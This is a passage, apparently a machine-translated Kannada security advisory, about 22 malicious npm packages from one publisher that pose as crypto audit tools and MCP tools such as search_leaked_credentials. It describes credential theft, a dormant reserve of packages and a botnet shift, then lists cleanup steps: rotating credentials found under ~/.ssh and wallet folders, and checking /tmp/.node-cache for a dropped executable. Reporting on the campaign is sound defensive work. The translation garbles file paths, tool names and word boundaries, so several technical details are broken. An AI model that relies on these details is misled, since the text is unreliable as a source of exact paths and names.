search_leaked_credentials,validate_chain_key,deploy_safe, ಮತ್ತು ಇದೇ ರೀತಿಯ "ಆಡಿಟ್" ಕ್ರಿಯಾಪದಗಳು. ರುಜುವಾತುಗಳಿಗಾಗಿ ಪ್ರಾಜೆಕ್ಟ್ ಡೈರೆಕ್ಟರಿಗಳನ್ನು ಸ್ಕ್ಯಾನ್ ಮಾಡುವುದಾಗಿ ಹೇಳಿಕೊಳ್ಳುವ ವಿವರಣೆಯನ್ನು ಹೊಂದಿರುವ ಉಪಕರಣವನ್ನು ಮೇಲ್ಮೈ ಮಾಡುವ MCP ಹೋಸ್ಟ್, ಏಜೆಂಟ್ ನಿಜವಾದ ಕೋಡ್ಬೇಸ್ನಲ್ಲಿ ಅದನ್ನು ಆಹ್ವಾನಿಸುವ ಮೊದಲು ಸ್ಪಷ್ಟ ಆಪರೇಟರ್ ಆಯ್ಕೆಯ ಅಗತ್ಯವಿರುತ್ತದೆ. MCP ಯ ಅಂಶವೆಂದರೆ ಏಜೆಂಟ್ ಲೂಪ್ಗೆ ತಿಳಿಯುವ ಯಾವುದೇ ಮಾರ್ಗವಿಲ್ಲsearch_leaked_credentialsಒಂದು ರುಜುವಾತು ಹುಡುಕಾಟ ಅಥವಾ ರುಜುವಾತು ಹೊರಹರಿವುಗಾರ.
22 ಪ್ಯಾಕೇಜ್ಗಳಲ್ಲಿ ಒಂದನ್ನು ಈಗಾಗಲೇ ಸ್ಥಾಪಿಸಿರಬಹುದಾದ ಡೆವಲಪರ್ಗಳಿಗಾಗಿ: ಯಾವುದೇ ಸರಳ ಪಠ್ಯ ಕೀಲಿಯನ್ನು ಊಹಿಸಿ ~ / .ssh, ~/.ಎಥೆರಿಯಮ್, ~/.ಬಿಟ್ಕಾಯಿನ್, ~/.ಸೋಲಾನಾ, ~/.ಇನ್ವಿಅಥವಾ ~/.git-ರುಜುವಾತುಗಳು ಹೊಂದಾಣಿಕೆಯಾಗಿದೆ, ಮೇಲಿನ env-ವೇರಿಯೇಬಲ್ ಫಿಲ್ಟರ್ ಪಟ್ಟಿಗೆ ಹೊಂದಿಕೆಯಾಗುವ ಪ್ರತಿಯೊಂದು ರುಜುವಾತುಗಳನ್ನು ತಿರುಗಿಸಿ ಮತ್ತು Linux/macOS ನಲ್ಲಿ ಕಾರ್ಯಗತಗೊಳಿಸಬಹುದಾದ ಫೈಲ್ಗಾಗಿ ಪರಿಶೀಲಿಸಿ /tmp/.ನೋಡ್-ಕ್ಯಾಶ್ (ಮತ್ತು ಯಾವುದೇ ಅನಾಥ ಪ್ರಕ್ರಿಯೆಯು ಅದರಿಂದ ಪ್ರಾರಂಭವಾಯಿತು). ಸೋಗು ಹಾಕಿದ ಉಪಕರಣದ ಕಾನೂನುಬದ್ಧ ಆವೃತ್ತಿಯನ್ನು ಮರು-ಸ್ಥಾಪಿಸಲಾಗುತ್ತಿದೆ (ಫೌಂಡ್ರಿ, ಟ್ರಫಲ್, ಹಾರ್ಡ್ಟೋಪಿ, ganache, ಇತ್ಯಾದಿ) ಕೈಬಿಡಲಾದ ಬೈನರಿಯನ್ನು ತೆಗೆದುಹಾಕುವುದಿಲ್ಲ.
ಈ ಕಥೆಯಲ್ಲಿ ಅತ್ಯಂತ ಹಳೆಯದಾದ ಭಾಗವೆಂದರೆ ನಿಷ್ಕ್ರಿಯ ರೂಪಾಂತರ-C ಭಾಗ. ಕ್ಲೀನ್ ಇನ್ಸ್ಟಾಲ್ ಪ್ರೊಫೈಲ್ ಮತ್ತು ಸ್ಥಾಪಿತ ಪ್ರಕಾಶಕರನ್ನು ಹೊಂದಿರುವ ಒಂಬತ್ತು ಪ್ಯಾಕೇಜ್ಗಳು ಆಪರೇಟರ್ ಮೀಸಲು ಇಡುವ ದಾಸ್ತಾನುಗಳಾಗಿವೆ. ಅವು ನಂತರ ಸ್ಫೋಟಗೊಂಡರೆ - ಫ್ಯಾಂಟಮ್ಬಾಟ್ ಮಾಡಿದಂತೆ ಅದು ... ಆಕ್ಸೋಯಿಸ್-ಯುಟಿಲ್ಸ್ ರುಜುವಾತು ಕಳ್ಳತನದಿಂದ ಬೋಟ್ನೆಟ್ ನೇಮಕಾತಿಗೆ ಮರುಪ್ಯಾಕೇಜ್ ಅನ್ನು ತಿರುಗಿಸಲಾಗಿದೆ - ಇಂದಿನಿಂದ ತೆಗೆದುಹಾಕುವಿಕೆಯ ನಡುವೆ ವೇರಿಯಂಟ್-ಸಿ ಪ್ಯಾಕೇಜ್ ಅನ್ನು ಪಿನ್ ಮಾಡಿದ ಯಾವುದೇ ನೋಂದಾವಣೆ ಗ್ರಾಹಕರ ವಿರುದ್ಧ ಅವು ಸ್ಫೋಟಗೊಳ್ಳುತ್ತವೆ. ದುರುದ್ದೇಶಪೂರಿತ ಪ್ಯಾಕೇಜ್ ಅನ್ನು ಆವೃತ್ತಿಯಿಂದ ಪಿನ್ ಮಾಡುವುದು ಪ್ರತಿ ಆವೃತ್ತಿಯನ್ನು ನಿಯಂತ್ರಿಸುವ ಪ್ರಕಾಶಕರಿಂದ ನಿಮ್ಮನ್ನು ರಕ್ಷಿಸುವುದಿಲ್ಲ.
ಉಲ್ಲೇಖಗಳು
- [npm ಪ್ರಕಾಶಕರ ಪುಟ ಡಿಡಿಜಿಡ್5640](https://www.npmjs.com/~ddjidd5640) — ಈ ಖಾತೆಯಡಿಯಲ್ಲಿ ಪ್ರಸ್ತುತ 22 ಪ್ಯಾಕೇಜ್ಗಳನ್ನು ಪಟ್ಟಿ ಮಾಡಲಾಗಿದೆ. ಬರೆಯುವ ಸಮಯದಲ್ಲಿ ಕ್ಯಾಟಲಾಗ್ಗೆ ಅಧಿಕೃತ ಮೂಲ.
- [npm ಪ್ಯಾಕೇಜ್ ಪುಟ ಕ್ರಿಪ್ಟೋ-ಕ್ರೆಡೆನ್ಶಿಯಲ್-ಸ್ಕ್ಯಾನರ್](https://www.npmjs.com/package/crypto-credential-scanner) — ಉದಾಹರಣೆ ರೂಪಾಂತರ-ಎ ಕಲಾಕೃತಿ; README, ಆವೃತ್ತಿ ಇತಿಹಾಸ ಮತ್ತು ಲೇಖಕರ ಲಿಂಕ್ಗಳು ಇಲ್ಲಿ ಗೋಚರಿಸುತ್ತವೆ.




